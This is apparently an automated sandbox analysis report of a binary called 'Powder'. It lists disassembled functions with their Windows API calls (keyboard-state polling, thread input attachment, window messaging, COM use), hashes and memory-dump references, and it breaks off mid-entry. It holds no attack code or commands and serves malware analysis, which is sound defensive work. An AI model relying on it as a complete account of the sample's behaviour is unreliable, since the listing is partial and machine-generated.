                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                  • String ID: static
                                                  • API String ID: 2559357485-2160076837
                                                  • Opcode ID: 2f366adcbb6a9b6398ed77861c60afd7dc424c845552f8ba99e80547220d8ee3
                                                  • Instruction ID: 8d9767399c2790b286b450a3aa691de903c2eb3041a89e55f3c869ba0cd3d92d
                                                  • Opcode Fuzzy Hash: 2f366adcbb6a9b6398ed77861c60afd7dc424c845552f8ba99e80547220d8ee3
                                                  • Instruction Fuzzy Hash: 2D318D32105219AFDF11AFA5DC49FDB3B6AFF09364F201216FA59B21A0C731D864DBA0
                                                  APIs
                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00E6357C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: IconLoad
                                                  • String ID: ,z$,z$0z$blank$info$question$stop$warning
                                                  • API String ID: 2457776203-2354401043
                                                  • Opcode ID: c9e39aa4ae6bdd1e79a4ca211b744673d3850ef6b4fb256329596852d9c36c7b
                                                  • Instruction ID: 79bce560f05e482f90d7e900002ddeaada788398e63f58af369bb44da134e991
                                                  • Opcode Fuzzy Hash: c9e39aa4ae6bdd1e79a4ca211b744673d3850ef6b4fb256329596852d9c36c7b
                                                  • Instruction Fuzzy Hash: 5111EB71689366BEA7105A78FC92DEA77DCDF053A4F20201BF511B7181E7A46F4045A0
                                                  APIs
                                                  • _memset.LIBCMT ref: 00E2706B
                                                    • Part of subcall function 00E28D58: __getptd_noexit.LIBCMT ref: 00E28D58
                                                  • __gmtime64_s.LIBCMT ref: 00E27104
                                                  • __gmtime64_s.LIBCMT ref: 00E2713A
                                                  • __gmtime64_s.LIBCMT ref: 00E27157
                                                  • __allrem.LIBCMT ref: 00E271AD
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E271C9
                                                  • __allrem.LIBCMT ref: 00E271E0
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E271FE
                                                  • __allrem.LIBCMT ref: 00E27215
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E27233
                                                  • __invoke_watson.LIBCMT ref: 00E272A4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                  • String ID:
                                                  • API String ID: 384356119-0
                                                  • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                  • Instruction ID: e20f1cf3f6a39c9a93b15d72df4be0caa28e6610564d8f2bbadcb3a7c8acd5ef
                                                  • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                  • Instruction Fuzzy Hash: 827116B2A04727EBD7149E79EC42BAAB7E9BF00324F14622AF554F7281E770DD448790
                                                  APIs
                                                  • _memset.LIBCMT ref: 00E62CE9
                                                  • GetMenuItemInfoW.USER32(00EC7890,000000FF,00000000,00000030), ref: 00E62D4A
                                                  • SetMenuItemInfoW.USER32(00EC7890,00000004,00000000,00000030), ref: 00E62D80
                                                  • Sleep.KERNEL32(000001F4), ref: 00E62D92
                                                  • GetMenuItemCount.USER32(?), ref: 00E62DD6
                                                  • GetMenuItemID.USER32(?,00000000), ref: 00E62DF2
                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00E62E1C
                                                  • GetMenuItemID.USER32(?,?), ref: 00E62E61
                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E62EA7
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E62EBB
                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E62EDC
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                  • String ID:
                                                  • API String ID: 4176008265-0
                                                  • Opcode ID: 1babb0eb550a957328b6cca4f851d74e914cc07f6a3cae6a60bc329e0724abca
                                                  • Instruction ID: 4acbecf113f2e4fa6f5e6fc17321959b5078a91c4bbbe804e1edaaea495d5499
                                                  • Opcode Fuzzy Hash: 1babb0eb550a957328b6cca4f851d74e914cc07f6a3cae6a60bc329e0724abca
                                                  • Instruction Fuzzy Hash: 0061D571940649AFDB22CF64EC88DBE7BB8EB41388F14506EF951B7251D732AD05CB21
                                                  APIs
                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E875CA
                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E875CD
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00E875F1
                                                  • _memset.LIBCMT ref: 00E87602
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E87614
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E8768C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$LongWindow_memset
                                                  • String ID:
                                                  • API String ID: 830647256-0
                                                  • Opcode ID: a9a678caf6d1f9529d22f5ffc3372dc6834f9ae8e1889aed195b5701817dfdda
                                                  • Instruction ID: b86a377876862a3fe2d01817e124decc1844b852f66639ffb55a2ca8a230bfd4
                                                  • Opcode Fuzzy Hash: a9a678caf6d1f9529d22f5ffc3372dc6834f9ae8e1889aed195b5701817dfdda
                                                  • Instruction Fuzzy Hash: 56618B75904208AFDB10EFA4CC85EEE77F8AB09704F20019AFA58B72A1D771AD45DF60
                                                  APIs
                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E577DD
                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00E57836
                                                  • VariantInit.OLEAUT32(?), ref: 00E57848
                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E57868
                                                  • VariantCopy.OLEAUT32(?,?), ref: 00E578BB
                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E578CF
                                                  • VariantClear.OLEAUT32(?), ref: 00E578E4
                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00E578F1
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E578FA
                                                  • VariantClear.OLEAUT32(?), ref: 00E5790C
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E57917
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                  • String ID:
                                                  • API String ID: 2706829360-0
                                                  • Opcode ID: 005726d2a1d227f14abde1ad7cbe0d09160eec099ee3a102d796e556de942fa5
                                                  • Instruction ID: ebd3f42baabfdcbc71aad84c0a74bd3a369e67e7b0989082473c924518461dd7
                                                  • Opcode Fuzzy Hash: 005726d2a1d227f14abde1ad7cbe0d09160eec099ee3a102d796e556de942fa5
                                                  • Instruction Fuzzy Hash: 38418175A00219DFCB04DFA9D848DEDBBB8FF48305F40846AE955B7261C730AA59CFA0
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 00E60530
                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00E605B1
                                                  • GetKeyState.USER32(000000A0), ref: 00E605CC
                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00E605E6
                                                  • GetKeyState.USER32(000000A1), ref: 00E605FB
                                                  • GetAsyncKeyState.USER32(00000011), ref: 00E60613
                                                  • GetKeyState.USER32(00000011), ref: 00E60625
                                                  • GetAsyncKeyState.USER32(00000012), ref: 00E6063D
                                                  • GetKeyState.USER32(00000012), ref: 00E6064F
                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00E60667
                                                  • GetKeyState.USER32(0000005B), ref: 00E60679
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: State$Async$Keyboard
                                                  • String ID:
                                                  • API String ID: 541375521-0
                                                  • Opcode ID: ef9d675b7fc3419ca6c546703e3f701a459c63dff1d05ec8eaf69399a91a6022
                                                  • Instruction ID: 0225d45dd003ee57b21da1a796cc646f0e81410034e318013bc87d13dab4038b
                                                  • Opcode Fuzzy Hash: ef9d675b7fc3419ca6c546703e3f701a459c63dff1d05ec8eaf69399a91a6022
                                                  • Instruction Fuzzy Hash: BC412C705847DA5EFF318764E8043BBBEA06B51388F04604AD6C6775C2EBD499D8CFA2
                                                  APIs
                                                    • Part of subcall function 00E04D37: __itow.LIBCMT ref: 00E04D62
                                                    • Part of subcall function 00E04D37: __swprintf.LIBCMT ref: 00E04DAC
                                                  • CoInitialize.OLE32 ref: 00E78AED
                                                  • CoUninitialize.OLE32 ref: 00E78AF8
                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00E93BBC,?), ref: 00E78B58
                                                  • IIDFromString.OLE32(?,?), ref: 00E78BCB
                                                  • VariantInit.OLEAUT32(?), ref: 00E78C65
                                                  • VariantClear.OLEAUT32(?), ref: 00E78CC6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                  • API String ID: 834269672-1287834457
                                                  • Opcode ID: 4a9bcf244e85b281a771a40c9a91dfcb2a20ec4fa4925f587066a6a0df414cf8
                                                  • Instruction ID: 6ee55d6c646320cb59b7cfc7429a4d1bdea3a9787799d50fe423c9ecbfa44d81
                                                  • Opcode Fuzzy Hash: 4a9bcf244e85b281a771a40c9a91dfcb2a20ec4fa4925f587066a6a0df414cf8
                                                  • Instruction Fuzzy Hash: 6461B1B02447019FC715DF14CA49F6ABBE8AF54714F00984AF989BB291CB70ED48CBA2
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00E6BB13
                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00E6BB89
                                                  • GetLastError.KERNEL32 ref: 00E6BB93
                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 00E6BC00
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                  • API String ID: 4194297153-14809454
                                                  • Opcode ID: b954f8d7dc0f289b9fece3f388884312511f0a9fad2d54a8805014a1aa6c53eb
                                                  • Instruction ID: 36cd6a8c9121e7690b16d34b87a6beaf6167ef0d7a148d263991606107f8a3da
                                                  • Opcode Fuzzy Hash: b954f8d7dc0f289b9fece3f388884312511f0a9fad2d54a8805014a1aa6c53eb
                                                  • Instruction Fuzzy Hash: D731E635A802099FC710EF65E845EEEB7B8EF44384F105166E905F72D5DB709D81CB50
                                                  APIs
                                                    • Part of subcall function 00E11A36: _memmove.LIBCMT ref: 00E11A77
                                                    • Part of subcall function 00E5B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00E5B7BD
                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E59BCC
                                                  • GetDlgCtrlID.USER32 ref: 00E59BD7
                                                  • GetParent.USER32 ref: 00E59BF3
                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E59BF6
                                                  • GetDlgCtrlID.USER32(?), ref: 00E59BFF
                                                  • GetParent.USER32(?), ref: 00E59C1B
                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E59C1E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 1536045017-1403004172
                                                  • Opcode ID: 408fb13d5565b14cd681a2333bca4195b3c3d9107c03114be0aa902929434e93
                                                  • Instruction ID: d98dba30c68d87304c7f40e4d0bbb198f2901c7dc86513739eb4b50660f91e12
                                                  • Opcode Fuzzy Hash: 408fb13d5565b14cd681a2333bca4195b3c3d9107c03114be0aa902929434e93
                                                  • Instruction Fuzzy Hash: 8821B071900104AFDF04EB61CC85EFEBBA5EF95311F101556FD61B3292DB7449189A20
                                                  APIs
                                                    • Part of subcall function 00E11A36: _memmove.LIBCMT ref: 00E11A77
                                                    • Part of subcall function 00E5B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00E5B7BD
                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00E59CB5
                                                  • GetDlgCtrlID.USER32 ref: 00E59CC0
                                                  • GetParent.USER32 ref: 00E59CDC
                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E59CDF
                                                  • GetDlgCtrlID.USER32(?), ref: 00E59CE8
                                                  • GetParent.USER32(?), ref: 00E59D04
                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E59D07
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 1536045017-1403004172
                                                  • Opcode ID: 73ddbac46567c5428fa909561740ea650536bf2abff0231db28c933c0b29875a
                                                  • Instruction ID: 8a37aa184b8f93c51f4a67d36bedc790c99a4d7ce4d0d5ef9d76e4e15b338745
                                                  • Opcode Fuzzy Hash: 73ddbac46567c5428fa909561740ea650536bf2abff0231db28c933c0b29875a
                                                  • Instruction Fuzzy Hash: 1021BD71A00204AFDF10EBA1CC85EFEBBB9EF94300F101156FD51B7292DB7589689B20
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00E78FC1
                                                  • CoInitialize.OLE32(00000000), ref: 00E78FEE
                                                  • CoUninitialize.OLE32 ref: 00E78FF8
                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00E790F8
                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00E79225
                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00E93BDC), ref: 00E79259
                                                  • CoGetObject.OLE32(?,00000000,00E93BDC,?), ref: 00E7927C
                                                  • SetErrorMode.KERNEL32(00000000), ref: 00E7928F
                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E7930F
                                                  • VariantClear.OLEAUT32(?), ref: 00E7931F
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                  • String ID:
                                                  • API String ID: 2395222682-0
                                                  • Opcode ID: 9ff1161a1ca3592866dd2b20f963f587b322226da924fc165daa27958b648534
                                                  • Instruction ID: 7fcdf1c48b7e62e1e0fbab3fbddd06ea580184ab32b7cb53ceec8be9dada2bb7
                                                  • Opcode Fuzzy Hash: 9ff1161a1ca3592866dd2b20f963f587b322226da924fc165daa27958b648534
                                                  • Instruction Fuzzy Hash: 07C139B1204305AFC704EF64C88496BB7E9FF89348F00995DF989AB262DB71ED45CB52
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 00E619EF
                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E60A67,?,00000001), ref: 00E61A03
                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00E61A0A
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E60A67,?,00000001), ref: 00E61A19
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E61A2B
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E60A67,?,00000001), ref: 00E61A44
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E60A67,?,00000001), ref: 00E61A56
                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E60A67,?,00000001), ref: 00E61A9B
                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E60A67,?,00000001), ref: 00E61AB0
                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E60A67,?,00000001), ref: 00E61ABB
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                  • String ID:
                                                  • API String ID: 2156557900-0
                                                  • Opcode ID: c4a2cd72bebb7a144dbbfe8c6e8cb4487e0d1813086a6a7f94366bfafac26bba
                                                  • Instruction ID: b7adcc91ca6c0ab78e4019fde79037a5e6945c503bcc2f3ca7d9acfed2559e9d
                                                  • Opcode Fuzzy Hash: c4a2cd72bebb7a144dbbfe8c6e8cb4487e0d1813086a6a7f94366bfafac26bba
                                                  • Instruction Fuzzy Hash: 50312671641248BFDB12DF92EE44FAA37AAEF54399F1441AAF800F7190CB759D48CB50
                                                  APIs
                                                  • GetSysColor.USER32(00000008), ref: 00E0260D
                                                  • SetTextColor.GDI32(?,000000FF), ref: 00E02617
                                                  • SetBkMode.GDI32(?,00000001), ref: 00E0262C
                                                  • GetStockObject.GDI32(00000005), ref: 00E02634
                                                  • GetClientRect.USER32(?), ref: 00E3C0FC
                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 00E3C113
                                                  • GetWindowDC.USER32(?), ref: 00E3C11F
                                                  • GetPixel.GDI32(00000000,?,?), ref: 00E3C12E
                                                  • ReleaseDC.USER32(?,00000000), ref: 00E3C140
                                                  • GetSysColor.USER32(00000005), ref: 00E3C15E
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                  • String ID:
                                                  • API String ID: 3430376129-0
                                                  • Opcode ID: c0a4d5fcb68eb7d90d9e75708faf233e60873f24111f8c27814ec74c87442cf6
                                                  • Instruction ID: fd1091b47f019b6df476d46a326e6d4be371e940f66f15fae4b7a7d3b6d2c41b
                                                  • Opcode Fuzzy Hash: c0a4d5fcb68eb7d90d9e75708faf233e60873f24111f8c27814ec74c87442cf6
                                                  • Instruction Fuzzy Hash: CC115932501205AFDB615FA5EC0CBE97BB1EF08321F504267FA65B50E2CB320995EF15
                                                  APIs
                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E0ADE1
                                                  • OleUninitialize.OLE32(?,00000000), ref: 00E0AE80
                                                  • UnregisterHotKey.USER32(?), ref: 00E0AFD7
                                                  • DestroyWindow.USER32(?), ref: 00E42F64
                                                  • FreeLibrary.KERNEL32(?), ref: 00E42FC9
                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E42FF6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
